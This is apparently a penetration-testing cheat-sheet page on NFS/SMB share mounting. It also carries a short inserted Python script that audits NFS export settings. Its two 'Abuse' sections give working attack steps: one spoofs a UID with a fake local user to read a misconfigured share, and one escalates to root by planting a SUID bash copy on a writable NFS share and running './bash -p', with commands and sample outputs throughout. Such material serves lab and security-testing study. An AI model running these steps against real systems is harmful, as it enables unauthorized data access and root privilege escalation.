TLDRBins / Share Mount



List Shares

showmount -e <TARGET>
Sample Output:
    $ showmount -e 10.10.11.191
    Export list for 10.10.11.191:
    /home/ross *
    /var/www/html *

Mount Share

sudo mkdir /mnt/share
Sample Output:
    $ sudo mkdir /mnt/share
sudo mount -t nfs <TARGET>:<SHARE> /mnt/share/
Sample Output:
    $ sudo mount -t nfs 10.10.11.191:/home/ross /mnt/share/
    $ ls /mnt/share
    Desktop Documents Downloads Music Pictures Public Templates Videos

Unmount Share

sudo umount /mnt/share/
Sample Output:
    $ sudo umount /mnt/share/

Mount Share (SMB/CIFS)

sudo mount -t cifs //<TARGET>/<SHARE> /mnt
# Without creds
sudo mount -t cifs -o user=,password= //<TARGET>/<SHARE> /mnt
# With creds
sudo mount -t cifs -o user='<USER>',pass='<PASSWORD>' //<TARGET>/<SHARE> /mnt
Sample Output:
    $ sudo mount -t cifs -o ro,user='localadmin',password='Secret123' //10.10.11.102/Shared /mnt
    $ ls /mnt
    Documents Software

Mount inside Windows

# Mount
net use \\localhost\c$ /u:'<DOMAIN>\<USER>' '<PASSWORD>'
# Check
dir \\localhost\c$\users\administrator\desktop


Abuse #1: Create Fake User to Read Misconfigured Share

# Check all mounted drives
mount
Sample Output:
    $ mount
    ---[SNIP]---
    10.10.11.191:/home/ross on /mnt/share type nfs4 (rw,relatime,vers=4.2,rsize=262144,wsize=262144,namlen=255,hard,proto=tcp,timeo=600,retrans=2,sec=sys,clientaddr=10.10.14.31,local_lock=none,addr=10.10.11.191)
# Check how shares are mounted
cat /etc/exports
Sample Output:
    $ cat /etc/exports
    /var/nfsshare *(rw,sync,root_squash,no_all_squash)
    /opt *(rw,sync,root_squash,no_all_squash)

+----------------------------------------------------------------------------------------------+
| root_squash  : root on the local system is treated as the nobody user on the target          |
| no_all_squash: every other user's permissions carry over from the local system to the target |
+----------------------------------------------------------------------------------------------+

# Add dummy user
sudo adduser --uid <UID> dummy
Sample Output:
    $ sudo adduser --uid 1001 dummy
    useradd warning: dummy's uid 1001 outside of the UID_MIN 1000 and UID_MAX 60000 range.
    New password:
    Retype new password:
    passwd: password updated successfully
    Changing the user information for dummy
    Enter the new value, or press ENTER for the default
        Full Name []: dummy
        Room Number []:
        Work Phone []:
        Home Phone []:
        Other []:
    Is the information correct? [Y/n] Y
# Switch to dummy user
sudo su dummy -c bash
Sample Output:
    $ sudo su dummy
    $ id
    uid=1001(dummy) gid=1001(dummy) groups=1001(dummy)
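
Seen from the server side, Abuse #1 works because the export accepts any host (*) and, with sec=sys and no all_squash, believes whatever UID the client sends. An added example (not part of the original page) that audits exports(5) text for those settings; the function names, finding labels and the last two sample lines are constructed for illustration.

```python
import re

# Constructed sample: the first two lines are the exports shown above, the
# last two are made-up contrast cases (192.0.2.0/24 is documentation space).
SAMPLE_EXPORTS = """\
/var/nfsshare *(rw,sync,root_squash,no_all_squash)
/opt *(rw,sync,root_squash,no_all_squash)
/srv/ro 192.0.2.10(ro,sync,all_squash)
/srv/build 192.0.2.0/24(rw,no_root_squash)  # build farm
"""

def parse_exports(text):
    """Yield (path, client, options) per client spec; no quoting/continuations."""
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 2:
            continue  # blank/comment line, or no client list (not covered here)
        for spec in fields[1:]:
            m = re.fullmatch(r"([^()]*)(?:\(([^()]*)\))?", spec)
            if m:
                opts = {o for o in (m.group(2) or "").split(",") if o}
                # A spec with no client name, e.g. "(rw)", applies to any host.
                yield fields[0], m.group(1) or "*", opts

def audit_exports(text):
    """Return (path, client, finding) tuples for identity-trust problems."""
    findings = []
    for path, client, opts in parse_exports(text):
        # exports(5) defaults when an option is absent: ro, root_squash,
        # no_all_squash, sec=sys (server believes the UID the client sends).
        sec = next((o[4:] for o in opts if o.startswith("sec=")), "sys")
        uid_trusted = "all_squash" not in opts and "sys" in sec.split(":")
        if "no_root_squash" in opts:
            findings.append((path, client, "NO_ROOT_SQUASH"))
        if client == "*" and uid_trusted:
            # Any host can mount and present any non-root UID it likes.
            findings.append((path, client, "ANY_HOST_UID_TRUST"))
            if "rw" in opts:
                findings.append((path, client, "ANY_HOST_WRITABLE"))
    return findings

if __name__ == "__main__":
    for path, client, finding in audit_exports(SAMPLE_EXPORTS):
        print(f"{finding:20} {path} {client}")
```

Restricting the client list to known hosts, adding all_squash where per-user identity is not needed, or moving to a Kerberos sec= flavor clears the ANY_HOST findings.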

Abuse #2: Writable NFS Share to Privesc

1. Make a '/bin/bash' Copy in Target Machine

# Copy '/bin/bash' to writable NFS share
cp /bin/bash .
Sample Output:
    (remote) www-data@mail01:/opt/share$ cp /bin/bash .

2. Create a Fake User

# In local machine
sudo adduser --uid <UID> <USER>
Sample Output:
    $ sudo adduser --uid 1001 fakeuser
    useradd warning: fakeuser's uid 1001 outside of the UID_MIN 1000 and UID_MAX 60000 range.
    New password:
    Retype new password:
    passwd: password updated successfully
    Changing the user information for fakeuser
    Enter the new value, or press ENTER for the default
        Full Name []: fakeuser
        Room Number []:
        Work Phone []:
        Home Phone []:
        Other []:
    Is the information correct? [Y/n] Y

3. Get the 'bash' Copy

# Mount share
sudo mount -t nfs <TARGET>:<SHARE> /mnt/share/
# Switch to fakeuser
su fakeuser
# Move 'bash' copy to a temp location
cp /mnt/share/bash /tmp/bash

4. Move the 'bash' Copy Back to Target Machine

# In target machine
rm bash
# Upload the 'bash' copy owned by fakeuser
cp /tmp/bash /mnt/share

5. Set SUID bit of the 'bash' Copy

# In local machine
chmod u+s /mnt/share/bash

6. Privesc

# In target machine, check
ls -l
Sample Output:
    (remote) www-data@mail01:/opt/share$ ls -la
    total 1380
    drwxrwxrwx 2 nobody nogroup 4096 Aug 3 17:23 .
    drwxr-xr-x 4 root root 4096 Jun 17 2023 ..
    -rw-r--r-- 1 root root 6003 Jun 18 2023 backup.tar.gz
    -rwsr-xr-x 1 peter.turner@example.com 902601108 1396520 Aug 3 17:23 bash
# Privesc
./bash -p